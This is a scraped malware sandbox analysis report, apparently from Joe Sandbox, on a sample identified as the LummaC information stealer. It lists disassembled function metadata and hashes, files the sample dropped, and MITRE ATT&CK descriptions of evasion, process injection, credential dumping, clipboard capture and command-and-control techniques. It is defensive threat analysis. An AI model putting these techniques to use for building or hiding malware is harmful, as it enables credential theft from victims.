Function 00413F00 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bb1252d0c3736a55c3272b40d7b1f320ffe7ee6ae8f7f49618d7a01f3e673c1
Instruction ID: 4ff6806ff11d2e54b4ba737cef66f121e26771b3cc0413b34a3fa4b43ab422b1
Opcode Fuzzy Hash: 6bb1252d0c3736a55c3272b40d7b1f320ffe7ee6ae8f7f49618d7a01f3e673c1
Instruction Fuzzy Hash: 86F027B1A0411067DB22CD44DCC0B77BBACCB87715F0904A6E84453202D165988183E9

Function 004304E0 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff3c7ada4236477f2c74a7790c615754344d8654ca36641ae4708eb0350f9e8f
Instruction ID: dc6c359ab834c448dcec545106b06a69f122102485c91544a0efcf98dccfa688
Opcode Fuzzy Hash: ff3c7ada4236477f2c74a7790c615754344d8654ca36641ae4708eb0350f9e8f
Instruction Fuzzy Hash: C1E0C2B7B4422106A768CE2A9C11677F3E2EBCA712F4DE62EE441D3308D238D84082A4

Function 00428390 Relevance: 29.8, APIs: 2, Strings: 15, Instructions: 93COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00428399
VariantInit.OLEAUT32 ref: 004283A5

Strings

C, xrefs: 004283C9
_, xrefs: 004283D9
Y, xrefs: 004283E1
A, xrefs: 004283C1
Q, xrefs: 00428401
i, xrefs: 00428421
[, xrefs: 004283E9
k, xrefs: 00428429
U, xrefs: 004283F1
], xrefs: 004283D1
h, xrefs: 00428425
W, xrefs: 004283F9
m, xrefs: 00428411
o, xrefs: 00428419
S, xrefs: 00428409

Memory Dump Source

Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd

Similarity

API ID: Variant$ClearInit
String ID: A$C$Q$S$U$W$Y$[$]$_$h$i$k$m$o
API String ID: 2610073882-3908310013
Opcode ID: 86d6197a872e0eb8fd7edbebe6bcae281471bab75b02436b6b55f4a8bd495bcd
Instruction ID: ffcc04c7029f7e92a7ef513eaba51872eda89f123297f54b8806c49e7e185d9d
Opcode Fuzzy Hash: 86d6197a872e0eb8fd7edbebe6bcae281471bab75b02436b6b55f4a8bd495bcd
Instruction Fuzzy Hash: B9410820108B81CFD725DF38C4D4312BFA1AB56224F18869DD9EA0F3D6C775A516CB62

Function 00426838 Relevance: 29.8, APIs: 2, Strings: 15, Instructions: 86COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00426841
VariantInit.OLEAUT32 ref: 0042684D

Strings

k, xrefs: 004268D1
Y, xrefs: 00426889
m, xrefs: 004268B9
Q, xrefs: 004268A9
h, xrefs: 004268CD
A, xrefs: 00426869
_, xrefs: 00426881
C, xrefs: 00426871
[, xrefs: 00426891
W, xrefs: 004268A1
], xrefs: 00426879
S, xrefs: 004268B1
U, xrefs: 00426899
i, xrefs: 004268C9
o, xrefs: 004268C1

Memory Dump Source

Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd

Similarity

API ID: Variant$ClearInit
String ID: A$C$Q$S$U$W$Y$[$]$_$h$i$k$m$o
API String ID: 2610073882-3908310013
Opcode ID: 2351576650fc8255a3ba423b0a35c92006ee7125edcb25a5be30a2057135fb62
Instruction ID: 1c1462e0d166baec536b2e7097613793751b6822708de083e4cbdb1de76f8a34
Opcode Fuzzy Hash: 2351576650fc8255a3ba423b0a35c92006ee7125edcb25a5be30a2057135fb62
Instruction Fuzzy Hash: 40410420108B81CFD725CF28C4D8212BFA16B56224F48869DD8EA4F7DBC3B5E415CBA2

Function 0042A135 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 0042A175
GetSystemMetrics.USER32 ref: 0042A184
DeleteObject.GDI32 ref: 0042A1CE
SelectObject.GDI32 ref: 0042A20E
SelectObject.GDI32 ref: 0042A268
DeleteObject.GDI32 ref: 0042A299

Strings

, xrefs: 0042A23F

Memory Dump Source

Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd

Similarity

API ID: Object$DeleteMetricsSelectSystem
String ID:
API String ID: 3911056724-3916222277
Opcode ID: 62bd2a14c3dd45d2ffc951592c0e22af4b10586288965d5bfb03c83b9d4d5474
Instruction ID: 80cb13d0aceb6d248945d742630e9f8afa96225f53b2ee93cdb52602f80f70a6
Opcode Fuzzy Hash: 62bd2a14c3dd45d2ffc951592c0e22af4b10586288965d5bfb03c83b9d4d5474
Instruction Fuzzy Hash: BC516CB4918B008FD750EF39D98561ABBF0BB89304F01892DE89AC7760E774E858CF56

Function 00429141 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 166memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 004291D7

Strings

0, xrefs: 0042937F
+, xrefs: 00429157
), xrefs: 0042915F
-, xrefs: 0042914F

Memory Dump Source

Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd

Similarity

API ID: AllocString
String ID: )$+$-$0
API String ID: 2525500382-630310612
Opcode ID: b644e1a1be857427b68361ed83749c992b73993d2c03ca3e3c6724717fe59fc4
Instruction ID: f636f14f6b541b916d7f8bc6cb79579b14b9cdf91d2bd4779e85a03e09712e48
Opcode Fuzzy Hash: b644e1a1be857427b68361ed83749c992b73993d2c03ca3e3c6724717fe59fc4
Instruction Fuzzy Hash: 3091FA60108FC29ED322CB3CC588751FFE17B26224F48879DD0E94BBD2C365A525C7A6

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Armanivenntii_crypted_EASY.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_aspnet_regiis.ex_50bfb89f751f3bc9a670ed08f716b2c28e2c7d0_b69738a1_50a4b111-a5d1-48c1-9ba0-ddf6cd44aa0c\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER272D.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2876.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2897.tmp.xml

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Armanivenntii_crypted_EASY.exe.log

C:\Users\user\AppData\Roaming\d3d9x.dll

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Windows Analysis Report
Armanivenntii_crypted_EASY.exe

Function 6CDC8810 Relevance: 14.7, APIs: 3, Strings: 5, Instructions: 670
COMMON

Function 0041C490 Relevance: 34.4, Strings: 27, Instructions: 604
COMMON

Function 0040A700 Relevance: 25.1, APIs: 1, Strings: 13, Instructions: 584
COMMON

Function 0042A39F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 124
COMMON

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre